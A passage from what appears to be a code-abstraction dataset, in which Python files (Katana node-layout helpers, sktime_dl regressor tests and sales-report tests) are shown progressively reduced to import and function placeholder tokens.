"<import token>\n\n\ndef change_node_layout(node, x_spacing=200, y_spacing=100):\n \"\"\"\n \"\"\"\n pos_x, pos_y = NodegraphAPI.GetNodePosition(node)\n new_pos_x = pos_x - x_spacing * (node.getNumInputPorts() - 1) / 2\n new_pos_y = pos_y + y_spacing\n for input_port in node.getInputPorts():\n if input_port.getNumConnectedPorts():\n input_node = input_port.getConnectedPort(0).getNode()\n if input_node != node.getParent():\n NodegraphAPI.SetNodePosition(input_node, (new_pos_x, new_pos_y)\n )\n change_node_layout(input_node, x_spacing, y_spacing)\n new_pos_x += x_spacing\n\n\ndef add_node_reference_param(dest_node, dest_node_param_name, node):\n \"\"\"\n \"\"\"\n dest_node_param = dest_node.getParameter(dest_node_param_name)\n if not dest_node_param:\n dest_node_param = dest_node.getParameters().createChildString(\n dest_node_param_name, '')\n dest_node_param.setExpression(\"getNode('{node_name}').getNodeName()\".\n format(node_name=node.getName()))\n\n\ndef get_reference_node(node, key):\n \"\"\"\n \"\"\"\n parameter = node.getParameter('node_' + key)\n if not parameter:\n return None\n return NodegraphAPI.GetNode(parameter.getValue(0))\n",
"<import token>\n\n\ndef change_node_layout(node, x_spacing=200, y_spacing=100):\n \"\"\"\n \"\"\"\n pos_x, pos_y = NodegraphAPI.GetNodePosition(node)\n new_pos_x = pos_x - x_spacing * (node.getNumInputPorts() - 1) / 2\n new_pos_y = pos_y + y_spacing\n for input_port in node.getInputPorts():\n if input_port.getNumConnectedPorts():\n input_node = input_port.getConnectedPort(0).getNode()\n if input_node != node.getParent():\n NodegraphAPI.SetNodePosition(input_node, (new_pos_x, new_pos_y)\n )\n change_node_layout(input_node, x_spacing, y_spacing)\n new_pos_x += x_spacing\n\n\ndef add_node_reference_param(dest_node, dest_node_param_name, node):\n \"\"\"\n \"\"\"\n dest_node_param = dest_node.getParameter(dest_node_param_name)\n if not dest_node_param:\n dest_node_param = dest_node.getParameters().createChildString(\n dest_node_param_name, '')\n dest_node_param.setExpression(\"getNode('{node_name}').getNodeName()\".\n format(node_name=node.getName()))\n\n\n<function token>\n",
"<import token>\n<function token>\n\n\ndef add_node_reference_param(dest_node, dest_node_param_name, node):\n \"\"\"\n \"\"\"\n dest_node_param = dest_node.getParameter(dest_node_param_name)\n if not dest_node_param:\n dest_node_param = dest_node.getParameters().createChildString(\n dest_node_param_name, '')\n dest_node_param.setExpression(\"getNode('{node_name}').getNodeName()\".\n format(node_name=node.getName()))\n\n\n<function token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n"
] | false |
99,814 | 5b39b1e694e01e86d13706909b0648ab07cfd683 | import numpy as np
import pytest
from sklearn.metrics import mean_squared_error
from sktime.datasets import load_airline
from sktime.datasets import load_italy_power_demand
from sktime.forecasting.compose import RecursiveTimeSeriesRegressionForecaster
from sktime.forecasting.model_selection import temporal_train_test_split
from sktime_dl.regression import MLPRegressor, MCDCNNRegressor, CNTCRegressor,\
LSTMFCNRegressor
from sktime_dl.utils.model_lists import (SMALL_NB_EPOCHS,
construct_all_regressors)
def test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):
"""
test a regressor
"""
print("Start test_regressor()")
X_train, y_train = load_italy_power_demand(split="train", return_X_y=True)
X_test, y_test = load_italy_power_demand(split="test", return_X_y=True)
# Create some regression values
y_train = np.zeros(len(y_train))
for i in range(len(X_train)):
y_train[i] = X_train.iloc[i].iloc[0].iloc[0]
y_test = np.zeros(len(y_test))
for i in range(len(X_test)):
y_test[i] = X_test.iloc[i].iloc[0].iloc[0]
estimator.fit(X_train[:10], y_train[:10])
estimator.predict(X_test[:10])
score = estimator.score(X_test[:10], y_test[:10])
print("Estimator score:", score)
print("End test_regressor()")
def test_regressor_forecasting(
regressor=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS), window_length=4
):
"""
test a regressor used for forecasting
"""
print("Start test_regressor_forecasting()")
if isinstance(regressor, MCDCNNRegressor):
regressor.nb_epochs = regressor.nb_epochs * 2
# load univariate time series data
y = load_airline()
y_train, y_test = temporal_train_test_split(y, test_size=5)
y_train = y_train[:window_length * 2]
# specify forecasting horizon
fh = np.arange(len(y_test)) + 1
# solve forecasting task via reduction to time series regression
forecaster = RecursiveTimeSeriesRegressionForecaster(
estimator=regressor, window_length=window_length
)
forecaster.fit(y_train)
y_pred = forecaster.predict(fh)
try:
mse = np.sqrt(mean_squared_error(y_test, y_pred))
print("Error:", mse)
except ValueError:
if isinstance(regressor, MCDCNNRegressor):
print(
"Warning: MCDCNNRegressor produced NaN predictions. This is a "
"known problem brought about by insufficient data/learning. "
"For now, we accept that this particular network produced "
"predictions at all (even NaNs) as passing for this "
"particular test. Providing more data/epochs risks slowing "
"down tests too much.")
else:
# unexpected error in all other cases
raise
print("End test_regressor_forecasting()")
def test_all_regressors():
for name, network in construct_all_regressors(SMALL_NB_EPOCHS).items():
print("\n\t\t" + name + " testing started")
test_regressor(network)
print("\t\t" + name + " testing finished")
@pytest.mark.parametrize(
"name, network",
construct_all_regressors(SMALL_NB_EPOCHS).items()
)
def test_all_forecasters(name, network):
window_length = 8
print("\n\t\t" + name + " forecasttesting \
started")
test_regressor_forecasting(network, window_length=window_length)
print("\t\t" + name + " forecasttesting \
finished")
| [
"import numpy as np\nimport pytest\nfrom sklearn.metrics import mean_squared_error\nfrom sktime.datasets import load_airline\nfrom sktime.datasets import load_italy_power_demand\nfrom sktime.forecasting.compose import RecursiveTimeSeriesRegressionForecaster\nfrom sktime.forecasting.model_selection import temporal_train_test_split\n\nfrom sktime_dl.regression import MLPRegressor, MCDCNNRegressor, CNTCRegressor,\\\n LSTMFCNRegressor\n\nfrom sktime_dl.utils.model_lists import (SMALL_NB_EPOCHS,\n construct_all_regressors)\n\n\ndef test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):\n \"\"\"\n test a regressor\n \"\"\"\n print(\"Start test_regressor()\")\n X_train, y_train = load_italy_power_demand(split=\"train\", return_X_y=True)\n X_test, y_test = load_italy_power_demand(split=\"test\", return_X_y=True)\n\n # Create some regression values\n y_train = np.zeros(len(y_train))\n for i in range(len(X_train)):\n y_train[i] = X_train.iloc[i].iloc[0].iloc[0]\n y_test = np.zeros(len(y_test))\n for i in range(len(X_test)):\n y_test[i] = X_test.iloc[i].iloc[0].iloc[0]\n\n estimator.fit(X_train[:10], y_train[:10])\n estimator.predict(X_test[:10])\n score = estimator.score(X_test[:10], y_test[:10])\n\n print(\"Estimator score:\", score)\n print(\"End test_regressor()\")\n\n\ndef test_regressor_forecasting(\n regressor=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS), window_length=4\n):\n \"\"\"\n test a regressor used for forecasting\n \"\"\"\n print(\"Start test_regressor_forecasting()\")\n\n if isinstance(regressor, MCDCNNRegressor):\n regressor.nb_epochs = regressor.nb_epochs * 2\n\n # load univariate time series data\n y = load_airline()\n y_train, y_test = temporal_train_test_split(y, test_size=5)\n y_train = y_train[:window_length * 2]\n\n # specify forecasting horizon\n fh = np.arange(len(y_test)) + 1\n\n # solve forecasting task via reduction to time series regression\n forecaster = RecursiveTimeSeriesRegressionForecaster(\n estimator=regressor, window_length=window_length\n )\n forecaster.fit(y_train)\n y_pred = forecaster.predict(fh)\n\n try:\n mse = np.sqrt(mean_squared_error(y_test, y_pred))\n print(\"Error:\", mse)\n except ValueError:\n if isinstance(regressor, MCDCNNRegressor):\n print(\n \"Warning: MCDCNNRegressor produced NaN predictions. This is a \"\n \"known problem brought about by insufficient data/learning. \"\n \"For now, we accept that this particular network produced \"\n \"predictions at all (even NaNs) as passing for this \"\n \"particular test. Providing more data/epochs risks slowing \"\n \"down tests too much.\")\n else:\n # unexpected error in all other cases\n raise\n\n print(\"End test_regressor_forecasting()\")\n\n\ndef test_all_regressors():\n for name, network in construct_all_regressors(SMALL_NB_EPOCHS).items():\n print(\"\\n\\t\\t\" + name + \" testing started\")\n test_regressor(network)\n print(\"\\t\\t\" + name + \" testing finished\")\n\n\[email protected](\n \"name, network\",\n construct_all_regressors(SMALL_NB_EPOCHS).items()\n)\ndef test_all_forecasters(name, network):\n window_length = 8\n print(\"\\n\\t\\t\" + name + \" forecasttesting \\\n started\")\n test_regressor_forecasting(network, window_length=window_length)\n print(\"\\t\\t\" + name + \" forecasttesting \\\n finished\")\n",
"import numpy as np\nimport pytest\nfrom sklearn.metrics import mean_squared_error\nfrom sktime.datasets import load_airline\nfrom sktime.datasets import load_italy_power_demand\nfrom sktime.forecasting.compose import RecursiveTimeSeriesRegressionForecaster\nfrom sktime.forecasting.model_selection import temporal_train_test_split\nfrom sktime_dl.regression import MLPRegressor, MCDCNNRegressor, CNTCRegressor, LSTMFCNRegressor\nfrom sktime_dl.utils.model_lists import SMALL_NB_EPOCHS, construct_all_regressors\n\n\ndef test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):\n \"\"\"\n test a regressor\n \"\"\"\n print('Start test_regressor()')\n X_train, y_train = load_italy_power_demand(split='train', return_X_y=True)\n X_test, y_test = load_italy_power_demand(split='test', return_X_y=True)\n y_train = np.zeros(len(y_train))\n for i in range(len(X_train)):\n y_train[i] = X_train.iloc[i].iloc[0].iloc[0]\n y_test = np.zeros(len(y_test))\n for i in range(len(X_test)):\n y_test[i] = X_test.iloc[i].iloc[0].iloc[0]\n estimator.fit(X_train[:10], y_train[:10])\n estimator.predict(X_test[:10])\n score = estimator.score(X_test[:10], y_test[:10])\n print('Estimator score:', score)\n print('End test_regressor()')\n\n\ndef test_regressor_forecasting(regressor=CNTCRegressor(nb_epochs=\n SMALL_NB_EPOCHS), window_length=4):\n \"\"\"\n test a regressor used for forecasting\n \"\"\"\n print('Start test_regressor_forecasting()')\n if isinstance(regressor, MCDCNNRegressor):\n regressor.nb_epochs = regressor.nb_epochs * 2\n y = load_airline()\n y_train, y_test = temporal_train_test_split(y, test_size=5)\n y_train = y_train[:window_length * 2]\n fh = np.arange(len(y_test)) + 1\n forecaster = RecursiveTimeSeriesRegressionForecaster(estimator=\n regressor, window_length=window_length)\n forecaster.fit(y_train)\n y_pred = forecaster.predict(fh)\n try:\n mse = np.sqrt(mean_squared_error(y_test, y_pred))\n print('Error:', mse)\n except ValueError:\n if isinstance(regressor, MCDCNNRegressor):\n print(\n 'Warning: MCDCNNRegressor produced NaN predictions. This is a known problem brought about by insufficient data/learning. For now, we accept that this particular network produced predictions at all (even NaNs) as passing for this particular test. Providing more data/epochs risks slowing down tests too much.'\n )\n else:\n raise\n print('End test_regressor_forecasting()')\n\n\ndef test_all_regressors():\n for name, network in construct_all_regressors(SMALL_NB_EPOCHS).items():\n print('\\n\\t\\t' + name + ' testing started')\n test_regressor(network)\n print('\\t\\t' + name + ' testing finished')\n\n\[email protected]('name, network', construct_all_regressors(\n SMALL_NB_EPOCHS).items())\ndef test_all_forecasters(name, network):\n window_length = 8\n print('\\n\\t\\t' + name + ' forecasttesting started')\n test_regressor_forecasting(network, window_length=window_length)\n print('\\t\\t' + name + ' forecasttesting finished')\n",
"<import token>\n\n\ndef test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):\n \"\"\"\n test a regressor\n \"\"\"\n print('Start test_regressor()')\n X_train, y_train = load_italy_power_demand(split='train', return_X_y=True)\n X_test, y_test = load_italy_power_demand(split='test', return_X_y=True)\n y_train = np.zeros(len(y_train))\n for i in range(len(X_train)):\n y_train[i] = X_train.iloc[i].iloc[0].iloc[0]\n y_test = np.zeros(len(y_test))\n for i in range(len(X_test)):\n y_test[i] = X_test.iloc[i].iloc[0].iloc[0]\n estimator.fit(X_train[:10], y_train[:10])\n estimator.predict(X_test[:10])\n score = estimator.score(X_test[:10], y_test[:10])\n print('Estimator score:', score)\n print('End test_regressor()')\n\n\ndef test_regressor_forecasting(regressor=CNTCRegressor(nb_epochs=\n SMALL_NB_EPOCHS), window_length=4):\n \"\"\"\n test a regressor used for forecasting\n \"\"\"\n print('Start test_regressor_forecasting()')\n if isinstance(regressor, MCDCNNRegressor):\n regressor.nb_epochs = regressor.nb_epochs * 2\n y = load_airline()\n y_train, y_test = temporal_train_test_split(y, test_size=5)\n y_train = y_train[:window_length * 2]\n fh = np.arange(len(y_test)) + 1\n forecaster = RecursiveTimeSeriesRegressionForecaster(estimator=\n regressor, window_length=window_length)\n forecaster.fit(y_train)\n y_pred = forecaster.predict(fh)\n try:\n mse = np.sqrt(mean_squared_error(y_test, y_pred))\n print('Error:', mse)\n except ValueError:\n if isinstance(regressor, MCDCNNRegressor):\n print(\n 'Warning: MCDCNNRegressor produced NaN predictions. This is a known problem brought about by insufficient data/learning. For now, we accept that this particular network produced predictions at all (even NaNs) as passing for this particular test. Providing more data/epochs risks slowing down tests too much.'\n )\n else:\n raise\n print('End test_regressor_forecasting()')\n\n\ndef test_all_regressors():\n for name, network in construct_all_regressors(SMALL_NB_EPOCHS).items():\n print('\\n\\t\\t' + name + ' testing started')\n test_regressor(network)\n print('\\t\\t' + name + ' testing finished')\n\n\[email protected]('name, network', construct_all_regressors(\n SMALL_NB_EPOCHS).items())\ndef test_all_forecasters(name, network):\n window_length = 8\n print('\\n\\t\\t' + name + ' forecasttesting started')\n test_regressor_forecasting(network, window_length=window_length)\n print('\\t\\t' + name + ' forecasttesting finished')\n",
"<import token>\n\n\ndef test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):\n \"\"\"\n test a regressor\n \"\"\"\n print('Start test_regressor()')\n X_train, y_train = load_italy_power_demand(split='train', return_X_y=True)\n X_test, y_test = load_italy_power_demand(split='test', return_X_y=True)\n y_train = np.zeros(len(y_train))\n for i in range(len(X_train)):\n y_train[i] = X_train.iloc[i].iloc[0].iloc[0]\n y_test = np.zeros(len(y_test))\n for i in range(len(X_test)):\n y_test[i] = X_test.iloc[i].iloc[0].iloc[0]\n estimator.fit(X_train[:10], y_train[:10])\n estimator.predict(X_test[:10])\n score = estimator.score(X_test[:10], y_test[:10])\n print('Estimator score:', score)\n print('End test_regressor()')\n\n\ndef test_regressor_forecasting(regressor=CNTCRegressor(nb_epochs=\n SMALL_NB_EPOCHS), window_length=4):\n \"\"\"\n test a regressor used for forecasting\n \"\"\"\n print('Start test_regressor_forecasting()')\n if isinstance(regressor, MCDCNNRegressor):\n regressor.nb_epochs = regressor.nb_epochs * 2\n y = load_airline()\n y_train, y_test = temporal_train_test_split(y, test_size=5)\n y_train = y_train[:window_length * 2]\n fh = np.arange(len(y_test)) + 1\n forecaster = RecursiveTimeSeriesRegressionForecaster(estimator=\n regressor, window_length=window_length)\n forecaster.fit(y_train)\n y_pred = forecaster.predict(fh)\n try:\n mse = np.sqrt(mean_squared_error(y_test, y_pred))\n print('Error:', mse)\n except ValueError:\n if isinstance(regressor, MCDCNNRegressor):\n print(\n 'Warning: MCDCNNRegressor produced NaN predictions. This is a known problem brought about by insufficient data/learning. For now, we accept that this particular network produced predictions at all (even NaNs) as passing for this particular test. Providing more data/epochs risks slowing down tests too much.'\n )\n else:\n raise\n print('End test_regressor_forecasting()')\n\n\ndef test_all_regressors():\n for name, network in construct_all_regressors(SMALL_NB_EPOCHS).items():\n print('\\n\\t\\t' + name + ' testing started')\n test_regressor(network)\n print('\\t\\t' + name + ' testing finished')\n\n\n<function token>\n",
"<import token>\n\n\ndef test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):\n \"\"\"\n test a regressor\n \"\"\"\n print('Start test_regressor()')\n X_train, y_train = load_italy_power_demand(split='train', return_X_y=True)\n X_test, y_test = load_italy_power_demand(split='test', return_X_y=True)\n y_train = np.zeros(len(y_train))\n for i in range(len(X_train)):\n y_train[i] = X_train.iloc[i].iloc[0].iloc[0]\n y_test = np.zeros(len(y_test))\n for i in range(len(X_test)):\n y_test[i] = X_test.iloc[i].iloc[0].iloc[0]\n estimator.fit(X_train[:10], y_train[:10])\n estimator.predict(X_test[:10])\n score = estimator.score(X_test[:10], y_test[:10])\n print('Estimator score:', score)\n print('End test_regressor()')\n\n\ndef test_regressor_forecasting(regressor=CNTCRegressor(nb_epochs=\n SMALL_NB_EPOCHS), window_length=4):\n \"\"\"\n test a regressor used for forecasting\n \"\"\"\n print('Start test_regressor_forecasting()')\n if isinstance(regressor, MCDCNNRegressor):\n regressor.nb_epochs = regressor.nb_epochs * 2\n y = load_airline()\n y_train, y_test = temporal_train_test_split(y, test_size=5)\n y_train = y_train[:window_length * 2]\n fh = np.arange(len(y_test)) + 1\n forecaster = RecursiveTimeSeriesRegressionForecaster(estimator=\n regressor, window_length=window_length)\n forecaster.fit(y_train)\n y_pred = forecaster.predict(fh)\n try:\n mse = np.sqrt(mean_squared_error(y_test, y_pred))\n print('Error:', mse)\n except ValueError:\n if isinstance(regressor, MCDCNNRegressor):\n print(\n 'Warning: MCDCNNRegressor produced NaN predictions. This is a known problem brought about by insufficient data/learning. For now, we accept that this particular network produced predictions at all (even NaNs) as passing for this particular test. Providing more data/epochs risks slowing down tests too much.'\n )\n else:\n raise\n print('End test_regressor_forecasting()')\n\n\n<function token>\n<function token>\n",
"<import token>\n\n\ndef test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):\n \"\"\"\n test a regressor\n \"\"\"\n print('Start test_regressor()')\n X_train, y_train = load_italy_power_demand(split='train', return_X_y=True)\n X_test, y_test = load_italy_power_demand(split='test', return_X_y=True)\n y_train = np.zeros(len(y_train))\n for i in range(len(X_train)):\n y_train[i] = X_train.iloc[i].iloc[0].iloc[0]\n y_test = np.zeros(len(y_test))\n for i in range(len(X_test)):\n y_test[i] = X_test.iloc[i].iloc[0].iloc[0]\n estimator.fit(X_train[:10], y_train[:10])\n estimator.predict(X_test[:10])\n score = estimator.score(X_test[:10], y_test[:10])\n print('Estimator score:', score)\n print('End test_regressor()')\n\n\n<function token>\n<function token>\n<function token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n"
] | false |
99,815 | a0e02a125b674b3af1d532e1c32eb7f928b80fd2 | from pathlib import Path
import pytest
import sys
SRC_DIR = Path(__file__).parent.parent / 'src'
sys.path.append(str(SRC_DIR))
from sales_report import *
records = [
Record('0001', '001', '12'),
Record('0012', '001', '1000'),
Record('0012', '001', '32'),
Record('0009', '007', '207'),
Record('0112', '007', '12119'),
Record('1009', '007', '200'),
]
class TestSalesReport:
def test_process_product(self):
prod = process_product('0001', iter(records[:1]))
assert next(prod) == ' Product: 0001 Value: 12'
with pytest.raises(StopIteration) as e_info:
next(prod)
assert e_info.value.value == 12
prod = process_product('0012', records[1:3])
assert next(prod) == ' Product: 0012 Value: 1032'
with pytest.raises(StopIteration) as e_info:
next(prod)
assert e_info.value.value == 1032
def test_process_product_group(self):
prod_group = process_product_group('001', iter(records[:3]))
assert next(prod_group) == 'Group: 001'
assert next(prod_group) == ' Product: 0001 Value: 12'
assert next(prod_group) == ' Product: 0012 Value: 1032'
assert next(prod_group) == ' Group total: 1044'
assert next(prod_group) == ''
with pytest.raises(StopIteration) as e_info:
next(prod_group)
assert e_info.value.value == 1044
prod_group = process_product_group('007', iter(records[3:]))
assert next(prod_group) == 'Group: 007'
assert next(prod_group) == ' Product: 0009 Value: 207'
assert next(prod_group) == ' Product: 0112 Value: 12119'
assert next(prod_group) == ' Product: 1009 Value: 200'
assert next(prod_group) == ' Group total: 12526'
assert next(prod_group) == ''
with pytest.raises(StopIteration) as e_info:
next(prod_group)
assert e_info.value.value == 12526
def test_generate_report(self):
report_lines = process_all(records)
assert '\n'.join(report_lines) == """\
Group: 001
Product: 0001 Value: 12
Product: 0012 Value: 1032
Group total: 1044
Group: 007
Product: 0009 Value: 207
Product: 0112 Value: 12119
Product: 1009 Value: 200
Group total: 12526
Total: 13570"""
| [
"from pathlib import Path\n\nimport pytest\nimport sys\n\nSRC_DIR = Path(__file__).parent.parent / 'src'\nsys.path.append(str(SRC_DIR))\n\nfrom sales_report import *\n\nrecords = [\n Record('0001', '001', '12'),\n Record('0012', '001', '1000'),\n Record('0012', '001', '32'),\n Record('0009', '007', '207'),\n Record('0112', '007', '12119'),\n Record('1009', '007', '200'),\n]\n\n\nclass TestSalesReport:\n\n def test_process_product(self):\n prod = process_product('0001', iter(records[:1]))\n assert next(prod) == ' Product: 0001 Value: 12'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 12\n\n prod = process_product('0012', records[1:3])\n assert next(prod) == ' Product: 0012 Value: 1032'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 1032\n\n def test_process_product_group(self):\n prod_group = process_product_group('001', iter(records[:3]))\n assert next(prod_group) == 'Group: 001'\n assert next(prod_group) == ' Product: 0001 Value: 12'\n assert next(prod_group) == ' Product: 0012 Value: 1032'\n assert next(prod_group) == ' Group total: 1044'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 1044\n\n prod_group = process_product_group('007', iter(records[3:]))\n assert next(prod_group) == 'Group: 007'\n assert next(prod_group) == ' Product: 0009 Value: 207'\n assert next(prod_group) == ' Product: 0112 Value: 12119'\n assert next(prod_group) == ' Product: 1009 Value: 200'\n assert next(prod_group) == ' Group total: 12526'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 12526\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"\\\nGroup: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"from pathlib import Path\nimport pytest\nimport sys\nSRC_DIR = Path(__file__).parent.parent / 'src'\nsys.path.append(str(SRC_DIR))\nfrom sales_report import *\nrecords = [Record('0001', '001', '12'), Record('0012', '001', '1000'),\n Record('0012', '001', '32'), Record('0009', '007', '207'), Record(\n '0112', '007', '12119'), Record('1009', '007', '200')]\n\n\nclass TestSalesReport:\n\n def test_process_product(self):\n prod = process_product('0001', iter(records[:1]))\n assert next(prod) == ' Product: 0001 Value: 12'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 12\n prod = process_product('0012', records[1:3])\n assert next(prod) == ' Product: 0012 Value: 1032'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 1032\n\n def test_process_product_group(self):\n prod_group = process_product_group('001', iter(records[:3]))\n assert next(prod_group) == 'Group: 001'\n assert next(prod_group) == ' Product: 0001 Value: 12'\n assert next(prod_group) == ' Product: 0012 Value: 1032'\n assert next(prod_group) == ' Group total: 1044'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 1044\n prod_group = process_product_group('007', iter(records[3:]))\n assert next(prod_group) == 'Group: 007'\n assert next(prod_group) == ' Product: 0009 Value: 207'\n assert next(prod_group) == ' Product: 0112 Value: 12119'\n assert next(prod_group) == ' Product: 1009 Value: 200'\n assert next(prod_group) == ' Group total: 12526'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 12526\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"Group: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"<import token>\nSRC_DIR = Path(__file__).parent.parent / 'src'\nsys.path.append(str(SRC_DIR))\n<import token>\nrecords = [Record('0001', '001', '12'), Record('0012', '001', '1000'),\n Record('0012', '001', '32'), Record('0009', '007', '207'), Record(\n '0112', '007', '12119'), Record('1009', '007', '200')]\n\n\nclass TestSalesReport:\n\n def test_process_product(self):\n prod = process_product('0001', iter(records[:1]))\n assert next(prod) == ' Product: 0001 Value: 12'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 12\n prod = process_product('0012', records[1:3])\n assert next(prod) == ' Product: 0012 Value: 1032'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 1032\n\n def test_process_product_group(self):\n prod_group = process_product_group('001', iter(records[:3]))\n assert next(prod_group) == 'Group: 001'\n assert next(prod_group) == ' Product: 0001 Value: 12'\n assert next(prod_group) == ' Product: 0012 Value: 1032'\n assert next(prod_group) == ' Group total: 1044'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 1044\n prod_group = process_product_group('007', iter(records[3:]))\n assert next(prod_group) == 'Group: 007'\n assert next(prod_group) == ' Product: 0009 Value: 207'\n assert next(prod_group) == ' Product: 0112 Value: 12119'\n assert next(prod_group) == ' Product: 1009 Value: 200'\n assert next(prod_group) == ' Group total: 12526'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 12526\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"Group: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"<import token>\n<assignment token>\nsys.path.append(str(SRC_DIR))\n<import token>\n<assignment token>\n\n\nclass TestSalesReport:\n\n def test_process_product(self):\n prod = process_product('0001', iter(records[:1]))\n assert next(prod) == ' Product: 0001 Value: 12'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 12\n prod = process_product('0012', records[1:3])\n assert next(prod) == ' Product: 0012 Value: 1032'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 1032\n\n def test_process_product_group(self):\n prod_group = process_product_group('001', iter(records[:3]))\n assert next(prod_group) == 'Group: 001'\n assert next(prod_group) == ' Product: 0001 Value: 12'\n assert next(prod_group) == ' Product: 0012 Value: 1032'\n assert next(prod_group) == ' Group total: 1044'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 1044\n prod_group = process_product_group('007', iter(records[3:]))\n assert next(prod_group) == 'Group: 007'\n assert next(prod_group) == ' Product: 0009 Value: 207'\n assert next(prod_group) == ' Product: 0112 Value: 12119'\n assert next(prod_group) == ' Product: 1009 Value: 200'\n assert next(prod_group) == ' Group total: 12526'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 12526\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"Group: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"<import token>\n<assignment token>\n<code token>\n<import token>\n<assignment token>\n\n\nclass TestSalesReport:\n\n def test_process_product(self):\n prod = process_product('0001', iter(records[:1]))\n assert next(prod) == ' Product: 0001 Value: 12'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 12\n prod = process_product('0012', records[1:3])\n assert next(prod) == ' Product: 0012 Value: 1032'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 1032\n\n def test_process_product_group(self):\n prod_group = process_product_group('001', iter(records[:3]))\n assert next(prod_group) == 'Group: 001'\n assert next(prod_group) == ' Product: 0001 Value: 12'\n assert next(prod_group) == ' Product: 0012 Value: 1032'\n assert next(prod_group) == ' Group total: 1044'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 1044\n prod_group = process_product_group('007', iter(records[3:]))\n assert next(prod_group) == 'Group: 007'\n assert next(prod_group) == ' Product: 0009 Value: 207'\n assert next(prod_group) == ' Product: 0112 Value: 12119'\n assert next(prod_group) == ' Product: 1009 Value: 200'\n assert next(prod_group) == ' Group total: 12526'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 12526\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"Group: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"<import token>\n<assignment token>\n<code token>\n<import token>\n<assignment token>\n\n\nclass TestSalesReport:\n\n def test_process_product(self):\n prod = process_product('0001', iter(records[:1]))\n assert next(prod) == ' Product: 0001 Value: 12'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 12\n prod = process_product('0012', records[1:3])\n assert next(prod) == ' Product: 0012 Value: 1032'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 1032\n <function token>\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"Group: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
